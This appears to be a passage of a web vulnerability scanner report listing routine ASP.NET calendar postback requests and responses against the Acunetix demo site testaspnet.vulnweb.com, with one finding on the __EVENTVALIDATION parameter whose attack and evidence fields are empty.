Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1171 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,171 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8338&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgDAM7AJutoIZGRkedF%2FUVQCWfXbwKwfXJmHOUg1%2BCI%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLTk7L5DQLHkIz%2BDgL%2BkLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gIC%2B6T5jQoC%2B6T5jQoC%2B6TtoAMC%2B6TtoAMC%2B6SBxwwC%2B6SBxwwC%2B6T1rAkC%2B6T1rAkC%2B6TpwwIC%2B6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3%2BQ8C3Mu3%2BQ8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5%2BoCAtzL5%2BoCAtzL29MPAtzL29MPAtzLz%2FYIAtzLz%2FYIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm%2FBQKK%2BdPZCQKK%2BdPZCQKK%2Bcf8AgKK%2Bcf8AgKK%2BfuTCgKK%2BfuTCgKK%2Be%2B2AwKK%2Be%2B2AwKK%2BYPNDAKK%2BYPNDAKK%2BbfgBQKK%2BbfgBQKK%2BauHDQKK%2BauHDQKK%2BZ%2FsCwKK%2BZ%2FsCwKK%2BbODAwKK%2BbODA852athZcMzPVMGpbI1qPgYz7%2BsR
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:43:19 GMT Content-Length: 12617
Response Body - size: 12,617 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgDAM7AJutoIZGRkedF/UVQCWfXbwKwfXJmHOUg1+CI=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLTk7L5DQLHkIz+DgL+kLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gIC+6T5jQoC+6T5jQoC+6TtoAMC+6TtoAMC+6SBxwwC+6SBxwwC+6T1rAkC+6T1rAkC+6TpwwIC+6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3+Q8C3Mu3+Q8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5+oCAtzL5+oCAtzL29MPAtzL29MPAtzLz/YIAtzLz/YIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm/BQKK+dPZCQKK+dPZCQKK+cf8AgKK+cf8AgKK+fuTCgKK+fuTCgKK+e+2AwKK+e+2AwKK+YPNDAKK+YPNDAKK+bfgBQKK+bfgBQKK+auHDQKK+auHDQKK+Z/sCwKK+Z/sCwKK+bODAwKK+bODA852athZcMzPVMGpbI1qPgYz7+sR" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">November 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:White" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8345')" style="color:Black" title="November 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8346')" style="color:Black" title="November 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8347')" style="color:Black" title="November 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8348')" style="color:Black" title="November 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8349')" style="color:Black" title="November 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8350')" style="color:Black" title="November 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8351')" style="color:Black" title="November 12">12</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8352')" style="color:Black" title="November 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8353')" style="color:Black" title="November 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8354')" style="color:Black" title="November 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8355')" style="color:Black" title="November 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8356')" style="color:Black" title="November 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8357')" style="color:Black" title="November 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8358')" style="color:Black" title="November 19">19</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8359')" style="color:Black" title="November 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8360')" style="color:Black" title="November 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8361')" style="color:Black" title="November 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8362')" style="color:Black" title="November 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8363')" style="color:Black" title="November 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8364')" style="color:Black" title="November 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8365')" style="color:Black" title="November 26">26</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1183 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,183 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8582&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDA%2FhzGedsIHgJTRBYBBgDA%2FhzGedsIZGRkU3%2BQPM%2BjDH7ZFg7PKVdM6YPvq3c%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLtl%2FPxBwKqztTQBQKM1crSCAKK%2Bb%2FgBQKK%2Bb%2FgBQKK%2BdOEDQKK%2BdOEDQKK%2BYfsCwKK%2BYfsCwKK%2BbuDAwKK%2BbuDAwK%2Fk%2BfECQK%2Fk%2BfECQK%2Fk5ubAQK%2Fk5ubAQK%2Fk4%2B%2BCgK%2Fk4%2B%2BCgK%2Fk6PVAwK%2Fk6PVAwK%2Fk9fpDAK%2Fk9fpDAK%2Fk8uMBAK%2Fk8uMBAK%2Fk%2F%2BjDQK%2Fk%2F%2BjDQK%2Fk5PGBgK%2Fk5PGBgK%2Fk8evAwK%2Fk8evAwK%2Fk%2FvCDAK%2Fk%2FvCDAKQusXrDwKQusXrDwKQuvmOBwKQuvmOBwKQuu0lApC67SUCkLqB%2BAkCkLqB%2BAkCkLq1nwECkLq1nwECkLqpsgoCkLqpsgoCkLrd1gMCkLrd1gMCkLrx7QwCkLrx7QwCkLql1QkCkLql1QkCkLrZ6QICkLrZ6QIC19mYngcC19mYngcC19mMNQLX2Yw1AtfZoMgJAtfZoMgJAtfZ1OwCAtfZ1OwCAtfZyIMKAtfZyIMKAtfZ%2FKYDAtfZ%2FKYDAtfZkP0MAtfZkP0MAtfZhJAEAtfZhJAEAtfZ%2BPkCAtfZ%2BPkCAtfZ7JwKAtfZ7JwKAqjg%2FoUNAqjg%2FoUNAqjgktgGAqjgktgGAqjghv8PAqjghv8PAqjgupIHAqjgupIHAqjgrikCqOCuKQKo4MLNCQKo4MLNCQKo4PbgAgKo4PbgAgKo4OqHCgKo4OqHCqxWdtf4cjlS8z9SNJsflEIEp3zg
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:14:03 GMT Content-Length: 12461
Response Body - size: 12,461 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDA/hzGedsIHgJTRBYBBgDA/hzGedsIZGRkU3+QPM+jDH7ZFg7PKVdM6YPvq3c=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLtl/PxBwKqztTQBQKM1crSCAKK+b/gBQKK+b/gBQKK+dOEDQKK+dOEDQKK+YfsCwKK+YfsCwKK+buDAwKK+buDAwK/k+fECQK/k+fECQK/k5ubAQK/k5ubAQK/k4++CgK/k4++CgK/k6PVAwK/k6PVAwK/k9fpDAK/k9fpDAK/k8uMBAK/k8uMBAK/k/+jDQK/k/+jDQK/k5PGBgK/k5PGBgK/k8evAwK/k8evAwK/k/vCDAK/k/vCDAKQusXrDwKQusXrDwKQuvmOBwKQuvmOBwKQuu0lApC67SUCkLqB+AkCkLqB+AkCkLq1nwECkLq1nwECkLqpsgoCkLqpsgoCkLrd1gMCkLrd1gMCkLrx7QwCkLrx7QwCkLql1QkCkLql1QkCkLrZ6QICkLrZ6QIC19mYngcC19mYngcC19mMNQLX2Yw1AtfZoMgJAtfZoMgJAtfZ1OwCAtfZ1OwCAtfZyIMKAtfZyIMKAtfZ/KYDAtfZ/KYDAtfZkP0MAtfZkP0MAtfZhJAEAtfZhJAEAtfZ+PkCAtfZ+PkCAtfZ7JwKAtfZ7JwKAqjg/oUNAqjg/oUNAqjgktgGAqjgktgGAqjghv8PAqjghv8PAqjgupIHAqjgupIHAqjgrikCqOCuKQKo4MLNCQKo4MLNCQKo4PbgAgKo4PbgAgKo4OqHCgKo4OqHCqxWdtf4cjlS8z9SNJsflEIEp3zg" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8552')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8613')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8576')" style="color:Black" title="June 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8577')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8578')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8579')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8580')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8581')" style="color:Black" title="June 30">30</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8582')" style="color:White" title="July 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8583')" style="color:Black" title="July 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8584')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8585')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8586')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8587')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8588')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8589')" style="color:Black" title="July 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8590')" style="color:Black" title="July 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8591')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8592')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8593')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8594')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8595')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8596')" style="color:Black" title="July 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8597')" style="color:Black" title="July 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8598')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8599')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8600')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8601')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8602')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8603')" style="color:Black" title="July 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8604')" style="color:Black" title="July 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8605')" style="color:Black" title="July 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8606')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8607')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8608')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8609')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8610')" style="color:Black" title="July 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8611')" style="color:Black" title="July 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8612')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8613')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8614')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8615')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8616')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8617')" style="color:Black" title="August 05">5</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are 